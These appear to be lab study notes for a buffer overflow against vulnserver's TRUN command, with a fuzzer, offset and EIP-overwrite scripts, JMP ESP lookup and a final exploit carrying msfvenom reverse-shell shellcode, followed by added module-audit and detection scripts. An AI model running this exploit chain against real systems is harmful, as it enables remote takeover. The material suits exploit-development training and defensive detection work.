
Buffer Overflow

https://www.youtube.com/watch?v=GqwyonqLYdQ

Spiking

  • generic_send_tcp 10.10.20.13 9999 trun.spk 0 0

trun.spk:

```
s_readline();
s_string("TRUN ");
s_string_variable("0");
```

Fuzzing

fuzz.py (Python 2):

```python
#!/usr/bin/python
# fuzz.py - send ever longer TRUN arguments until the service stops responding
import sys, socket
from time import sleep

buffer = "A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.10.20.13', 9999))
        s.send(('TRUN /.:/' + buffer))
        s.close()
        sleep(1)
        buffer = buffer + "A" * 100   # grow the payload by 100 bytes per round
    except:
        # the connection fails once the service has crashed
        print "Fuzzing crashed at %s bytes" % str(len(buffer))
        sys.exit()
```

  • Note the byte count at which the service crashed (the break point)

Find offset

  • /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 6000

offset.py (Python 2):

```python
#!/usr/bin/python
# offset.py - send the cyclic pattern instead of the "A"s so the crash reveals the offset
import sys, socket

offset = "pattern_create_output"   # paste the pattern_create.rb output here

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.10.20.13', 9999))
    s.send(('TRUN /.:/' + offset))
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
```

  • Collect the EIP value shown in Immunity Debugger at the crash

Find Offset

  • /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 6000 -q EIP-Value

Overwrite EIP

eipwrite.py (Python 2):

```python
#!/usr/bin/python
# eipwrite.py - fill up to the offset with "A"s, then overwrite EIP with four "B"s
import sys, socket

shellcode = "A" * 2003 + "B" * 4   # 2003 = pattern_offset value

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.10.20.13', 9999))
    s.send(('TRUN /.:/' + shellcode))
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
```

  • Check in Immunity that EIP reads 42424242 (all B's)

Check bad characters

  • run badchars.py
  • In Immunity, right-click ESP and choose Follow in Dump
  • Check that after 42424242 no bad characters are found
  • The bytes 01 to FF should follow in sequence; any byte that is missing or altered (B0 in the example) is a bad character
  • If not, write down the locations of all bad characters

Find right module

Check for memory protection

  • Open Immunity
  • run !mona modules
  • look for a DLL with all protection columns set to False
  • run !mona find -s "\xff\xe4" -m essfunc.dll (search for JMP ESP opcodes)
  • copy the RETURN ADDR, 625011AF in this example
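Reading the protection columns by eye works for one DLL; a small parser makes the same check repeatable when auditing your own binaries for missing mitigations. This is an added example, not part of the original notes: the MONA_OUTPUT table is constructed in the layout of a `!mona modules` listing (column names Rebase, SafeSEH, ASLR and NXCompat are assumed; bases and version strings are made up), so adjust the header handling if your mona version prints different columns.

```python
#!/usr/bin/env python3
# audit_modules.py - list loaded modules that ship without any memory protection.
# Added example, not part of the original notes. MONA_OUTPUT is a constructed
# listing in the layout of a "!mona modules" table (column names assumed);
# adapt the header handling if your mona version prints different columns.

PROTECTION_COLUMNS = ("Rebase", "SafeSEH", "ASLR", "NXCompat")

# Constructed sample: two modules without protections and one system DLL with
# all of them (base addresses and version strings are made up).
MONA_OUTPUT = """\
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
 0x62500000 | 0x62508000 | 0x00008000 | False  | False   | False | False    | False  | -1.0- [essfunc.dll] (C:\\vulnserver\\essfunc.dll)
 0x00400000 | 0x00407000 | 0x00007000 | False  | False   | False | False    | False  | -1.0- [vulnserver.exe] (C:\\vulnserver\\vulnserver.exe)
 0x77a10000 | 0x77b50000 | 0x00140000 | True   | True    | True  | True     | True   | 6.1.7601.17514 [kernel32.dll] (C:\\Windows\\system32\\kernel32.dll)
"""


def parse_modules(text):
    """Parse a pipe-separated module table into a list of dicts."""
    rows = [line for line in text.splitlines() if "|" in line]
    if not rows:
        return []
    header = [cell.strip() for cell in rows[0].split("|")]
    modules = []
    for line in rows[1:]:
        cells = [cell.strip() for cell in line.split("|")]
        if len(cells) != len(header):
            continue  # skip decorations or truncated lines
        row = dict(zip(header, cells))
        info = row["Version, Modulename & Path"]
        name = info[info.index("[") + 1:info.index("]")]
        flags = {col: row[col] == "True" for col in PROTECTION_COLUMNS}
        modules.append({"name": name, "base": row["Base"], "protections": flags})
    return modules


def unprotected_modules(modules):
    """Names of modules whose protection columns are all False."""
    return [m["name"] for m in modules if not any(m["protections"].values())]


if __name__ == "__main__":
    mods = parse_modules(MONA_OUTPUT)
    for m in mods:
        missing = [col for col, on in m["protections"].items() if not on]
        print("%-16s base %s missing: %s" % (m["name"], m["base"], ", ".join(missing) or "none"))
    print("fully unprotected:", unprotected_modules(mods))
```

A module that shows up in `unprotected_modules` is the one an attacker will pick for a static JMP ESP, so it is also the one to rebuild with /DYNAMICBASE, /NXCOMPAT and /SAFESEH first.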

Check EIP overwrite with JMP info

  • in Immunity click the black arrow (go to address) and enter the JMP address 625011af
  • set a breakpoint on that instruction

  • run writemodule.py (Python 2):

```python
#!/usr/bin/python
# writemodule.py - overwrite EIP with the JMP ESP address 625011af (little-endian)
import sys, socket

shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.10.20.13', 9999))
    s.send(('TRUN /.:/' + shellcode))
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
```

  • back in Immunity, check that EIP shows the JMP address and that the breakpoint hit inside the DLL (essfunc.625011af in this example)

Generate shellcode

  • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.11 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
  • copy the output into overflow.py as the overflow variable

overflow.py (Python 2):

```python
#!/usr/bin/python
# overflow.py - offset filler, JMP ESP address, NOP sled, then the msfvenom shellcode
import sys, socket

overflow = (
    "\xba\xb9\x52\x1f\x1a\xd9\xc2\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
    "\x52\x31\x50\x12\x03\x50\x12\x83\x79\x56\xfd\xef\x85\xbf\x83"
    "\x10\x75\x40\xe4\x99\x90\x71\x24\xfd\xd1\x22\x94\x75\xb7\xce"
    "\x5f\xdb\x23\x44\x2d\xf4\x44\xed\x98\x22\x6b\xee\xb1\x17\xea"
    "\x6c\xc8\x4b\xcc\x4d\x03\x9e\x0d\x89\x7e\x53\x5f\x42\xf4\xc6"
    "\x4f\xe7\x40\xdb\xe4\xbb\x45\x5b\x19\x0b\x67\x4a\x8c\x07\x3e"
    "\x4c\x2f\xcb\x4a\xc5\x37\x08\x76\x9f\xcc\xfa\x0c\x1e\x04\x33"
    "\xec\x8d\x69\xfb\x1f\xcf\xae\x3c\xc0\xba\xc6\x3e\x7d\xbd\x1d"
    "\x3c\x59\x48\x85\xe6\x2a\xea\x61\x16\xfe\x6d\xe2\x14\x4b\xf9"
    "\xac\x38\x4a\x2e\xc7\x45\xc7\xd1\x07\xcc\x93\xf5\x83\x94\x40"
    "\x97\x92\x70\x26\xa8\xc4\xda\x97\x0c\x8f\xf7\xcc\x3c\xd2\x9f"
    "\x21\x0d\xec\x5f\x2e\x06\x9f\x6d\xf1\xbc\x37\xde\x7a\x1b\xc0"
    "\x21\x51\xdb\x5e\xdc\x5a\x1c\x77\x1b\x0e\x4c\xef\x8a\x2f\x07"
    "\xef\x33\xfa\x88\xbf\x9b\x55\x69\x6f\x5c\x06\x01\x65\x53\x79"
    "\x31\x86\xb9\x12\xd8\x7d\x2a\x17\x17\x69\xa1\x4f\x25\x91\xa4"
    "\xd3\xa0\x77\xac\xfb\xe4\x20\x59\x65\xad\xba\xf8\x6a\x7b\xc7"
    "\x3b\xe0\x88\x38\xf5\x01\xe4\x2a\x62\xe2\xb3\x10\x25\xfd\x69"
    "\x3c\xa9\x6c\xf6\xbc\xa4\x8c\xa1\xeb\xe1\x63\xb8\x79\x1c\xdd"
    "\x12\x9f\xdd\xbb\x5d\x1b\x3a\x78\x63\xa2\xcf\xc4\x47\xb4\x09"
    "\xc4\xc3\xe0\xc5\x93\x9d\x5e\xa0\x4d\x6c\x08\x7a\x21\x26\xdc"
    "\xfb\x09\xf9\x9a\x03\x44\x8f\x42\xb5\x31\xd6\x7d\x7a\xd6\xde"
    "\x06\x66\x46\x20\xdd\x22\x66\xc3\xf7\x5e\x0f\x5a\x92\xe2\x52"
    "\x5d\x49\x20\x6b\xde\x7b\xd9\x88\xfe\x0e\xdc\xd5\xb8\xe3\xac"
    "\x46\x2d\x03\x02\x66\x64"
)

# 32 NOPs give the decoder stub room before the shellcode starts
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.10.20.13', 9999))
    s.send(('TRUN /.:/' + shellcode))
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
```
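The finished payload has a recognisable shape on the wire: a TRUN argument far longer than any legitimate one, a long run of identical filler bytes, a NOP sled and the fixed JMP ESP address. The following detection script, an added example that is not part of the original notes, checks a captured request for each of these traits; the sample requests are constructed and the thresholds are assumptions to tune for your environment. It is written for Python 3, unlike the Python 2 scripts above.

```python
#!/usr/bin/env python3
# trun_detect.py - flag TRUN requests shaped like the overflow built above
# (oversized argument, long filler run, NOP sled, the JMP ESP address bytes).
# Added example, not part of the original notes; sample requests are
# constructed and the thresholds are assumptions.
import re

MAX_TRUN_ARG = 1000                  # assumed: legitimate TRUN arguments are short
NOP_SLED_MIN = 16                    # assumed: 16+ consecutive 0x90 bytes
FILLER_RUN_MIN = 256                 # assumed: 256+ identical bytes in a row
JMP_ESP_ADDR = b"\xaf\x11\x50\x62"   # 0x625011AF little-endian, from the notes

NOP_SLED_RE = re.compile(rb"\x90{%d,}" % NOP_SLED_MIN)
FILLER_RE = re.compile(rb"(.)\1{%d,}" % (FILLER_RUN_MIN - 1), re.DOTALL)


def analyse_trun(request):
    """Return {'suspicious': bool, 'reasons': [...]} for one raw request."""
    result = {"suspicious": False, "reasons": []}
    if not request.startswith(b"TRUN "):
        return result                  # only the TRUN command is inspected here
    arg = request[len(b"TRUN "):]
    if len(arg) > MAX_TRUN_ARG:
        result["reasons"].append("oversized argument (%d bytes)" % len(arg))
    filler = FILLER_RE.search(arg)
    if filler:
        result["reasons"].append("filler run of 0x%02x" % filler.group(1)[0])
    if NOP_SLED_RE.search(arg):
        result["reasons"].append("NOP sled")
    if JMP_ESP_ADDR in arg:
        result["reasons"].append("known JMP ESP address 0x625011af")
    result["suspicious"] = bool(result["reasons"])
    return result


# Constructed samples: a benign request, one shaped like overflow.py's payload
# (shellcode replaced by INT3 bytes) and a long request for another command.
SAMPLE_REQUESTS = [
    b"TRUN hello",
    b"TRUN /.:/" + b"A" * 2003 + JMP_ESP_ADDR + b"\x90" * 32 + b"\xcc" * 10,
    b"OTHER " + b"A" * 3000,
]


def count_suspicious(requests):
    """Number of requests in the list that trigger at least one rule."""
    return sum(1 for r in requests if analyse_trun(r)["suspicious"])


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        verdict = analyse_trun(req)
        print(req[:12], "suspicious" if verdict["suspicious"] else "ok", verdict["reasons"])
```

The length rule alone catches the fuzzing stage as well as the final exploit, since every script in the notes sends well over 1000 bytes to TRUN; the address and NOP rules add confidence but are easy to vary, so treat them as corroboration rather than the primary signal.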